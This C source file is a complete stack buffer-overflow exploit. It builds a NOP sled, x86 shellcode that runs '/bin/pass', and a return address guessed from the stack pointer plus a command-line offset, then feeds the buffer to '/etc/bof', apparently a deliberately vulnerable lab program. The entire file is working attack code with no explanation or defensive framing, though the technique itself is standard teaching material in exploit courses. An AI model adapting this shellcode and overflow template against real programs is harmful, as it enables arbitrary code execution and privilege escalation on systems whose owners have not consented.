#include <stdlib.h>

#define DEFAULT_BUFFER_SIZE              80
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x0c\x31\xc0\x88\x46\x09\x89\x46\x10\xb0\x0b\x89\xf3"
  "\x8d\x4e\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  "\xff\xff\x2f\x62\x69\x6e\x2f\x70\x61\x73\x73";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
  unsigned char *buff, *ptr;
  long int *addr_ptr, address;
  int i, offset, bsize=DEFAULT_BUFFER_SIZE;
 
  if (!(buff = malloc(bsize))) {
    perror("malloc()");
    exit(-1);
  }

  if(argc!=2)
    exit(-1);
  
  offset = atoi(argv[1]);
  address = get_sp() - offset;

  for (i = 0; i < bsize-strlen(shellcode)-sizeof(address); i++)
    buff[i] = NOP;

  ptr = buff + bsize - sizeof(address) - strlen(shellcode);
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  ptr = buff + bsize - sizeof(address);
  addr_ptr = (long *) ptr;
  *(addr_ptr++) = address;
  execl("/etc/bof", "bof", buff, NULL);
}